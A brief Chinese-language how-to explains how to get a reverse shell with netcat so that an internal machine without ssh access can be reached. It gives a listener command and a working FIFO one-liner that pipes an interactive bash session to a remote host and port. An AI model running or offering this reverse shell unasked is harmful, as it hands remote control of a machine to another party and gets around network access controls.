內網機器無法使用ssh登錄時,可以使用shell反向連接(shell反彈)達到登錄的目的。
實現方式之一就是利用nc命令
服務端
# nc -l 6000
客戶端
1.使用nc 連接到服務端
nc host 6000
2.將服務端發送的命令作為shell的輸入
3.將shell的輸出作為nc的輸入
步驟2和3好像循環了,可以使用FIFO解決
nc->FIFO->shell->nc
#mkfifo /tmp/fifo
#cat /tmp/fifo | bash -i 2>&1 | nc host 6000 > /tmp/fifo